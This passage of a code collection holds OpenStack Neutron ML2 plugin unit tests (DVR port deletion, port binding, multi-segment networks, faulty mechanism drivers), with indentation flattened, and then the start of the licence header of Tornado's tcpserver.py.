service_constants.L3_ROUTER_NAT)
with self.port() as port:
port_id = port['port']['id']
# check that nothing is returned when notifications are handled
# by the called method
self.assertIsNone(l3plugin.disassociate_floatingips(ctx, port_id))
class TestMl2DvrPortsV2(TestMl2PortsV2):
def setUp(self):
super(TestMl2DvrPortsV2, self).setUp()
extensions = ['router',
constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS]
self.plugin = manager.NeutronManager.get_plugin()
self.l3plugin = mock.Mock()
type(self.l3plugin).supported_extension_aliases = (
mock.PropertyMock(return_value=extensions))
self.service_plugins = {'L3_ROUTER_NAT': self.l3plugin}
def _test_delete_dvr_serviced_port(self, device_owner, floating_ip=False):
ns_to_delete = {'host': 'myhost', 'agent_id': 'vm_l3_agent',
'router_id': 'my_router'}
fip_set = set()
if floating_ip:
fip_set.add(ns_to_delete['router_id'])
with contextlib.nested(
mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value=self.service_plugins),
self.port(do_delete=False,
device_owner=device_owner),
mock.patch.object(self.l3plugin, 'notify_routers_updated'),
mock.patch.object(self.l3plugin, 'disassociate_floatingips',
return_value=fip_set),
mock.patch.object(self.l3plugin, 'dvr_deletens_if_no_port',
return_value=[ns_to_delete]),
mock.patch.object(self.l3plugin, 'remove_router_from_l3_agent')
) as (get_service_plugin, port, notify, disassociate_floatingips,
dvr_delns_ifno_port, remove_router_from_l3_agent):
port_id = port['port']['id']
self.plugin.delete_port(self.context, port_id)
notify.assert_has_calls([mock.call(self.context, fip_set)])
dvr_delns_ifno_port.assert_called_once_with(self.context,
port['port']['id'])
remove_router_from_l3_agent.assert_has_calls([
mock.call(self.context, ns_to_delete['agent_id'],
ns_to_delete['router_id'])
])
def test_delete_last_vm_port(self):
self._test_delete_dvr_serviced_port(device_owner='compute:None')
def test_delete_last_vm_port_with_floatingip(self):
self._test_delete_dvr_serviced_port(device_owner='compute:None',
floating_ip=True)
def test_delete_vm_port_namespace_already_deleted(self):
ns_to_delete = {'host': 'myhost',
'agent_id': 'vm_l3_agent',
'router_id': 'my_router'}
with contextlib.nested(
mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value=self.service_plugins),
self.port(do_delete=False,
device_owner='compute:None'),
mock.patch.object(self.l3plugin, 'dvr_deletens_if_no_port',
return_value=[ns_to_delete]),
mock.patch.object(self.l3plugin, 'remove_router_from_l3_agent',
side_effect=l3agentscheduler.RouterNotHostedByL3Agent(
router_id=ns_to_delete['router_id'],
agent_id=ns_to_delete['agent_id']))
) as (get_service_plugin, port, dvr_delns_ifno_port,
remove_router_from_l3_agent):
self.plugin.delete_port(self.context, port['port']['id'])
remove_router_from_l3_agent.assert_called_once_with(self.context,
ns_to_delete['agent_id'], ns_to_delete['router_id'])
def test_delete_lbaas_vip_port(self):
self._test_delete_dvr_serviced_port(
device_owner=constants.DEVICE_OWNER_LOADBALANCER)
def test_concurrent_csnat_port_delete(self):
plugin = manager.NeutronManager.get_service_plugins()[
service_constants.L3_ROUTER_NAT]
r = plugin.create_router(
self.context,
{'router': {'name': 'router', 'admin_state_up': True}})
with self.subnet() as s:
p = plugin.add_router_interface(self.context, r['id'],
{'subnet_id': s['subnet']['id']})
# lie to turn the port into an SNAT interface
with self.context.session.begin():
rp = self.context.session.query(l3_db.RouterPort).filter_by(
port_id=p['port_id']).first()
rp.port_type = constants.DEVICE_OWNER_ROUTER_SNAT
# take the port away before csnat gets a chance to delete it
# to simulate a concurrent delete
orig_get_ports = plugin._core_plugin.get_ports
def get_ports_with_delete_first(*args, **kwargs):
plugin._core_plugin.delete_port(self.context,
p['port_id'],
l3_port_check=False)
return orig_get_ports(*args, **kwargs)
plugin._core_plugin.get_ports = get_ports_with_delete_first
# This should be able to handle a concurrent delete without raising
# an exception
router = plugin._get_router(self.context, r['id'])
plugin.delete_csnat_router_interface_ports(self.context, router)
class TestMl2PortBinding(Ml2PluginV2TestCase,
test_bindings.PortBindingsTestCase):
# Test case does not set binding:host_id, so ml2 does not attempt
# to bind port
VIF_TYPE = portbindings.VIF_TYPE_UNBOUND
HAS_PORT_FILTER = False
ENABLE_SG = True
FIREWALL_DRIVER = test_sg_rpc.FIREWALL_HYBRID_DRIVER
def setUp(self, firewall_driver=None):
test_sg_rpc.set_firewall_driver(self.FIREWALL_DRIVER)
config.cfg.CONF.set_override(
'enable_security_group', self.ENABLE_SG,
group='SECURITYGROUP')
super(TestMl2PortBinding, self).setUp()
def _check_port_binding_profile(self, port, profile=None):
self.assertIn('id', port)
self.assertIn(portbindings.PROFILE, port)
value = port[portbindings.PROFILE]
self.assertEqual(profile or {}, value)
def test_create_port_binding_profile(self):
self._test_create_port_binding_profile({'a': 1, 'b': 2})
def test_update_port_binding_profile(self):
self._test_update_port_binding_profile({'c': 3})
def test_create_port_binding_profile_too_big(self):
s = 'x' * 5000
profile_arg = {portbindings.PROFILE: {'d': s}}
try:
with self.port(expected_res_status=400,
arg_list=(portbindings.PROFILE,),
**profile_arg):
pass
except webob.exc.HTTPClientError:
pass
def test_remove_port_binding_profile(self):
profile = {'e': 5}
profile_arg = {portbindings.PROFILE: profile}
with self.port(arg_list=(portbindings.PROFILE,),
**profile_arg) as port:
self._check_port_binding_profile(port['port'], profile)
port_id = port['port']['id']
profile_arg = {portbindings.PROFILE: None}
port = self._update('ports', port_id,
{'port': profile_arg})['port']
self._check_port_binding_profile(port)
port = self._show('ports', port_id)['port']
self._check_port_binding_profile(port)
def test_return_on_concurrent_delete_and_binding(self):
# create a port and delete it so we have an expired mechanism context
with self.port() as port:
plugin = manager.NeutronManager.get_plugin()
binding = ml2_db.get_locked_port_and_binding(self.context.session,
port['port']['id'])[1]
binding['host'] = 'test'
mech_context = driver_context.PortContext(
plugin, self.context, port['port'],
plugin.get_network(self.context, port['port']['network_id']),
binding)
with contextlib.nested(
mock.patch('neutron.plugins.ml2.plugin.'
'db.get_locked_port_and_binding',
return_value=(None, None)),
mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin._make_port_dict')
) as (glpab_mock, mpd_mock):
plugin._bind_port_if_needed(mech_context)
# called during deletion to get port
self.assertTrue(glpab_mock.mock_calls)
# should have returned before calling _make_port_dict
self.assertFalse(mpd_mock.mock_calls)
def test_port_binding_profile_not_changed(self):
profile = {'e': 5}
profile_arg = {portbindings.PROFILE: profile}
with self.port(arg_list=(portbindings.PROFILE,),
**profile_arg) as port:
self._check_port_binding_profile(port['port'], profile)
port_id = port['port']['id']
state_arg = {'admin_state_up': True}
port = self._update('ports', port_id,
{'port': state_arg})['port']
self._check_port_binding_profile(port, profile)
port = self._show('ports', port_id)['port']
self._check_port_binding_profile(port, profile)
def test_process_dvr_port_binding_update_router_id(self):
host_id = 'host'
binding = models.DVRPortBinding(
port_id='port_id',
host=host_id,
router_id='old_router_id',
vif_type=portbindings.VIF_TYPE_OVS,
vnic_type=portbindings.VNIC_NORMAL,
cap_port_filter=False,
status=constants.PORT_STATUS_DOWN)
plugin = manager.NeutronManager.get_plugin()
mock_network = {'id': 'net_id'}
context = mock.Mock()
new_router_id = 'new_router'
attrs = {'device_id': new_router_id, portbindings.HOST_ID: host_id}
with mock.patch.object(plugin, '_update_port_dict_binding'):
with mock.patch.object(ml2_db, 'get_network_segments',
return_value=[]):
mech_context = driver_context.DvrPortContext(
self, context, 'port', mock_network, binding)
plugin._process_dvr_port_binding(mech_context, context, attrs)
self.assertEqual(new_router_id,
mech_context._binding.router_id)
self.assertEqual(host_id, mech_context._binding.host)
def test_update_dvr_port_binding_on_non_existent_port(self):
plugin = manager.NeutronManager.get_plugin()
port = {
'id': 'foo_port_id',
'binding:host_id': 'foo_host',
}
with mock.patch.object(ml2_db, 'ensure_dvr_port_binding') as mock_dvr:
plugin.update_dvr_port_binding(
self.context, 'foo_port_id', {'port': port})
self.assertFalse(mock_dvr.called)
class TestMl2PortBindingNoSG(TestMl2PortBinding):
HAS_PORT_FILTER = False
ENABLE_SG = False
FIREWALL_DRIVER = test_sg_rpc.FIREWALL_NOOP_DRIVER
class TestMl2PortBindingHost(Ml2PluginV2TestCase,
test_bindings.PortBindingsHostTestCaseMixin):
pass
class TestMl2PortBindingVnicType(Ml2PluginV2TestCase,
test_bindings.PortBindingsVnicTestCaseMixin):
pass
class TestMultiSegmentNetworks(Ml2PluginV2TestCase):
def setUp(self, plugin=None):
super(TestMultiSegmentNetworks, self).setUp()
def test_allocate_dynamic_segment(self):
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet1'}
network_id = network['network']['id']
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet1',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
self.assertTrue(dynamic_segment[driver_api.SEGMENTATION_ID] > 0)
segment2 = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.SEGMENTATION_ID: 1234,
driver_api.PHYSICAL_NETWORK: 'physnet3'}
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment2)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
segmentation_id='1234')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet3',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
self.assertEqual(dynamic_segment[driver_api.SEGMENTATION_ID], 1234)
def test_allocate_dynamic_segment_multiple_physnets(self):
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet1'}
network_id = network['network']['id']
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet1',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
dynamic_segmentation_id = dynamic_segment[driver_api.SEGMENTATION_ID]
self.assertTrue(dynamic_segmentation_id > 0)
dynamic_segment1 = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
dynamic_segment1_id = dynamic_segment1[driver_api.SEGMENTATION_ID]
self.assertEqual(dynamic_segmentation_id, dynamic_segment1_id)
segment2 = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet2'}
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment2)
dynamic_segment2 = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet2')
dynamic_segmentation2_id = dynamic_segment2[driver_api.SEGMENTATION_ID]
self.assertNotEqual(dynamic_segmentation_id, dynamic_segmentation2_id)
def test_allocate_release_dynamic_segment(self):
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet1'}
network_id = network['network']['id']
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet1',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
dynamic_segmentation_id = dynamic_segment[driver_api.SEGMENTATION_ID]
self.assertTrue(dynamic_segmentation_id > 0)
self.driver.type_manager.release_dynamic_segment(
self.context.session, dynamic_segment[driver_api.ID])
self.assertIsNone(ml2_db.get_dynamic_segment(
self.context.session, network_id, 'physnet1'))
def test_create_network_provider(self):
data = {'network': {'name': 'net1',
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
self.assertEqual('vlan', network['network'][pnet.NETWORK_TYPE])
self.assertEqual('physnet1', network['network'][pnet.PHYSICAL_NETWORK])
self.assertEqual(1, network['network'][pnet.SEGMENTATION_ID])
self.assertNotIn(mpnet.SEGMENTS, network['network'])
def test_create_network_single_multiprovider(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1}],
'tenant_id': 'tenant_one'}}
net_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt, net_req.get_response(self.api))
self.assertEqual('vlan', network['network'][pnet.NETWORK_TYPE])
self.assertEqual('physnet1', network['network'][pnet.PHYSICAL_NETWORK])
self.assertEqual(1, network['network'][pnet.SEGMENTATION_ID])
self.assertNotIn(mpnet.SEGMENTS, network['network'])
# Tests get_network()
net_req = self.new_show_request('networks', network['network']['id'])
network = self.deserialize(self.fmt, net_req.get_response(self.api))
self.assertEqual('vlan', network['network'][pnet.NETWORK_TYPE])
self.assertEqual('physnet1', network['network'][pnet.PHYSICAL_NETWORK])
self.assertEqual(1, network['network'][pnet.SEGMENTATION_ID])
self.assertNotIn(mpnet.SEGMENTS, network['network'])
def test_create_network_multiprovider(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1},
{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 2}],
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segments = network['network'][mpnet.SEGMENTS]
for segment_index, segment in enumerate(data['network']
[mpnet.SEGMENTS]):
for field in [pnet.NETWORK_TYPE, pnet.PHYSICAL_NETWORK,
pnet.SEGMENTATION_ID]:
self.assertEqual(segment.get(field),
segments[segment_index][field])
# Tests get_network()
net_req = self.new_show_request('networks', network['network']['id'])
network = self.deserialize(self.fmt, net_req.get_response(self.api))
segments = network['network'][mpnet.SEGMENTS]
for segment_index, segment in enumerate(data['network']
[mpnet.SEGMENTS]):
for field in [pnet.NETWORK_TYPE, pnet.PHYSICAL_NETWORK,
pnet.SEGMENTATION_ID]:
self.assertEqual(segment.get(field),
segments[segment_index][field])
def test_create_network_with_provider_and_multiprovider_fail(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1}],
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
self.assertEqual(400, res.status_int)
def test_create_network_duplicate_full_segments(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1},
{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1}],
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
self.assertEqual(400, res.status_int)
def test_create_network_duplicate_partial_segments(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1'},
{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1'}],
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
self.assertEqual(201, res.status_int)
def test_release_network_segments(self):
data = {'network': {'name': 'net1',
'admin_state_up': True,
'shared': False,
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
network = self.deserialize(self.fmt, res)
network_id = network['network']['id']
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet2'}
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet2')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet2',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
self.assertTrue(dynamic_segment[driver_api.SEGMENTATION_ID] > 0)
with mock.patch.object(type_vlan.VlanTypeDriver,
'release_segment') as rs:
req = self.new_delete_request('networks', network_id)
res = req.get_response(self.api)
self.assertEqual(2, rs.call_count)
self.assertEqual(ml2_db.get_network_segments(
self.context.session, network_id), [])
self.assertIsNone(ml2_db.get_dynamic_segment(
self.context.session, network_id, 'physnet2'))
def test_release_segment_no_type_driver(self):
data = {'network': {'name': 'net1',
'admin_state_up': True,
'shared': False,
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
network = self.deserialize(self.fmt, res)
network_id = network['network']['id']
segment = {driver_api.NETWORK_TYPE: 'faketype',
driver_api.PHYSICAL_NETWORK: 'physnet1',
driver_api.ID: 1}
with mock.patch('neutron.plugins.ml2.managers.LOG') as log:
with mock.patch('neutron.plugins.ml2.managers.db') as db:
db.get_network_segments.return_value = (segment,)
self.driver.type_manager.release_network_segments(
self.context.session, network_id)
log.error.assert_called_once_with(
"Failed to release segment '%s' because "
"network type is not supported.", segment)
def test_create_provider_fail(self):
segment = {pnet.NETWORK_TYPE: None,
pnet.PHYSICAL_NETWORK: 'phys_net',
pnet.SEGMENTATION_ID: None}
with testtools.ExpectedException(exc.InvalidInput):
self.driver.type_manager._process_provider_create(segment)
def test_create_network_plugin(self):
data = {'network': {'name': 'net1',
'admin_state_up': True,
'shared': False,
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
def raise_mechanism_exc(*args, **kwargs):
raise ml2_exc.MechanismDriverError(
method='create_network_postcommit')
with mock.patch('neutron.plugins.ml2.managers.MechanismManager.'
'create_network_precommit', new=raise_mechanism_exc):
with testtools.ExpectedException(ml2_exc.MechanismDriverError):
self.driver.create_network(self.context, data)
def test_extend_dictionary_no_segments(self):
network = dict(name='net_no_segment', id='5', tenant_id='tenant_one')
self.driver.type_manager._extend_network_dict_provider(self.context,
network)
self.assertIsNone(network[pnet.NETWORK_TYPE])
self.assertIsNone(network[pnet.PHYSICAL_NETWORK])
self.assertIsNone(network[pnet.SEGMENTATION_ID])
class TestMl2AllowedAddressPairs(Ml2PluginV2TestCase,
test_pair.TestAllowedAddressPairs):
def setUp(self, plugin=None):
super(test_pair.TestAllowedAddressPairs, self).setUp(
plugin=PLUGIN_NAME)
class DHCPOptsTestCase(test_dhcpopts.TestExtraDhcpOpt):
def setUp(self, plugin=None):
super(test_dhcpopts.ExtraDhcpOptDBTestCase, self).setUp(
plugin=PLUGIN_NAME)
class Ml2PluginV2FaultyDriverTestCase(test_plugin.NeutronDbPluginV2TestCase):
def setUp(self):
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
['test', 'logger'],
group='ml2')
super(Ml2PluginV2FaultyDriverTestCase, self).setUp(PLUGIN_NAME)
self.port_create_status = 'DOWN'
class TestFaultyMechansimDriver(Ml2PluginV2FaultyDriverTestCase):
def test_create_network_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'create_network_postcommit',
side_effect=ml2_exc.MechanismDriverError):
tenant_id = str(uuid.uuid4())
data = {'network': {'name': 'net1',
'tenant_id': tenant_id}}
req = self.new_create_request('networks', data)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
query_params = "tenant_id=%s" % tenant_id
nets = self._list('networks', query_params=query_params)
self.assertFalse(nets['networks'])
def test_delete_network_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'delete_network_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'delete_network_postcommit') as dnp:
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network_res = network_req.get_response(self.api)
self.assertEqual(201, network_res.status_int)
network = self.deserialize(self.fmt, network_res)
net_id = network['network']['id']
req = self.new_delete_request('networks', net_id)
res = req.get_response(self.api)
self.assertEqual(204, res.status_int)
# Test if other mechanism driver was called
self.assertTrue(dnp.called)
self._show('networks', net_id,
expected_code=webob.exc.HTTPNotFound.code)
def test_update_network_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'update_network_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'update_network_postcommit') as unp:
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network_res = network_req.get_response(self.api)
self.assertEqual(201, network_res.status_int)
network = self.deserialize(self.fmt, network_res)
net_id = network['network']['id']
new_name = 'a_brand_new_name'
data = {'network': {'name': new_name}}
req = self.new_update_request('networks', data, net_id)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
# Test if other mechanism driver was called
self.assertTrue(unp.called)
net = self._show('networks', net_id)
self.assertEqual(new_name, net['network']['name'])
self._delete('networks', net_id)
def test_create_subnet_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'create_subnet_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with self.network() as network:
net_id = network['network']['id']
data = {'subnet': {'network_id': net_id,
'cidr': '10.0.20.0/24',
'ip_version': '4',
'name': 'subnet1',
'tenant_id':
network['network']['tenant_id'],
'gateway_ip': '10.0.20.1'}}
req = self.new_create_request('subnets', data)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
query_params = "network_id=%s" % net_id
subnets = self._list('subnets', query_params=query_params)
self.assertFalse(subnets['subnets'])
def test_delete_subnet_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'delete_subnet_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'delete_subnet_postcommit') as dsp:
with self.network() as network:
data = {'subnet': {'network_id':
network['network']['id'],
'cidr': '10.0.20.0/24',
'ip_version': '4',
'name': 'subnet1',
'tenant_id':
network['network']['tenant_id'],
'gateway_ip': '10.0.20.1'}}
subnet_req = self.new_create_request('subnets', data)
subnet_res = subnet_req.get_response(self.api)
self.assertEqual(201, subnet_res.status_int)
subnet = self.deserialize(self.fmt, subnet_res)
subnet_id = subnet['subnet']['id']
req = self.new_delete_request('subnets', subnet_id)
res = req.get_response(self.api)
self.assertEqual(204, res.status_int)
# Test if other mechanism driver was called
self.assertTrue(dsp.called)
self._show('subnets', subnet_id,
expected_code=webob.exc.HTTPNotFound.code)
def test_update_subnet_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'update_subnet_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'update_subnet_postcommit') as usp:
with self.network() as network:
data = {'subnet': {'network_id':
network['network']['id'],
'cidr': '10.0.20.0/24',
'ip_version': '4',
'name': 'subnet1',
'tenant_id':
network['network']['tenant_id'],
'gateway_ip': '10.0.20.1'}}
subnet_req = self.new_create_request('subnets', data)
subnet_res = subnet_req.get_response(self.api)
self.assertEqual(201, subnet_res.status_int)
subnet = self.deserialize(self.fmt, subnet_res)
subnet_id = subnet['subnet']['id']
new_name = 'a_brand_new_name'
data = {'subnet': {'name': new_name}}
req = self.new_update_request('subnets', data, subnet_id)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
# Test if other mechanism driver was called
self.assertTrue(usp.called)
subnet = self._show('subnets', subnet_id)
self.assertEqual(new_name, subnet['subnet']['name'])
self._delete('subnets', subnet['subnet']['id'])
def test_create_port_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'create_port_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with self.network() as network:
net_id = network['network']['id']
data = {'port': {'network_id': net_id,
'tenant_id':
network['network']['tenant_id'],
'name': 'port1',
'admin_state_up': 1,
'fixed_ips': []}}
req = self.new_create_request('ports', data)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
query_params = "network_id=%s" % net_id
ports = self._list('ports', query_params=query_params)
self.assertFalse(ports['ports'])
def test_update_port_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'update_port_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'update_port_postcommit') as upp:
with self.network() as network:
data = {'port': {'network_id': network['network']['id'],
'tenant_id':
network['network']['tenant_id'],
'name': 'port1',
'admin_state_up': 1,
'fixed_ips': []}}
port_req = self.new_create_request('ports', data)
port_res = port_req.get_response(self.api)
self.assertEqual(201, port_res.status_int)
port = self.deserialize(self.fmt, port_res)
port_id = port['port']['id']
new_name = 'a_brand_new_name'
data = {'port': {'name': new_name}}
req = self.new_update_request('ports', data, port_id)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
# Test if other mechanism driver was called
self.assertTrue(upp.called)
port = self._show('ports', port_id)
self.assertEqual(new_name, port['port']['name'])
self._delete('ports', port['port']['id'])
class TestMl2PluginCreateUpdateDeletePort(base.BaseTestCase):
def setUp(self):
super(TestMl2PluginCreateUpdateDeletePort, self).setUp()
self.context = mock.MagicMock()
def _ensure_transaction_is_closed(self):
transaction = self.context.session.begin(subtransactions=True)
enter = transaction.__enter__.call_count
exit = transaction.__exit__.call_count
self.assertEqual(enter, exit)
def _create_plugin_for_create_update_port(self, new_host_port):
plugin = ml2_plugin.Ml2Plugin()
plugin.extension_manager = mock.Mock()
plugin.type_manager = mock.Mock()
plugin.mechanism_manager = mock.Mock()
plugin.notifier = mock.Mock()
plugin._get_host_port_if_changed = mock.Mock(
return_value=new_host_port)
plugin._notify_l3_agent_new_port = mock.Mock()
plugin._notify_l3_agent_new_port.side_effect = (
lambda c, p: self._ensure_transaction_is_closed())
return plugin
def test_create_port_rpc_outside_transaction(self):
with contextlib.nested(
mock.patch.object(ml2_plugin.Ml2Plugin, '__init__'),
mock.patch.object(base_plugin.NeutronDbPluginV2, 'create_port'),
) as (init, super_create_port):
init.return_value = None
new_host_port = mock.Mock()
plugin = self._create_plugin_for_create_update_port(new_host_port)
plugin.create_port(self.context, mock.MagicMock())
plugin._notify_l3_agent_new_port.assert_called_once_with(
self.context, new_host_port)
def test_update_port_rpc_outside_transaction(self):
with contextlib.nested(
mock.patch.object(ml2_plugin.Ml2Plugin, '__init__'),
mock.patch.object(base_plugin.NeutronDbPluginV2, 'update_port'),
) as (init, super_update_port):
init.return_value = None
new_host_port = mock.Mock()
plugin = self._create_plugin_for_create_update_port(new_host_port)
plugin.update_port(self.context, 'fake_id', mock.MagicMock())
plugin._notify_l3_agent_new_port.assert_called_once_with(
self.context, new_host_port)
def test_vmarp_table_update_outside_of_delete_transaction(self):
l3plugin = mock.Mock()
l3plugin.dvr_vmarp_table_update = (
lambda *args, **kwargs: self._ensure_transaction_is_closed())
l3plugin.dvr_deletens_if_no_port.return_value = []
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
with contextlib.nested(
mock.patch.object(ml2_plugin.Ml2Plugin, '__init__',
return_value=None),
mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value={'L3_ROUTER_NAT': l3plugin}),
):
plugin = self._create_plugin_for_create_update_port(mock.Mock())
# deleting the port will call dvr_vmarp_table_update, which will
# run the transaction balancing function defined in this test
plugin.delete_port(self.context, 'fake_id')
| apache-2.0 |
leekchan/tornado_test | tornado/tcpserver.py | 74 | 10693 | #!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
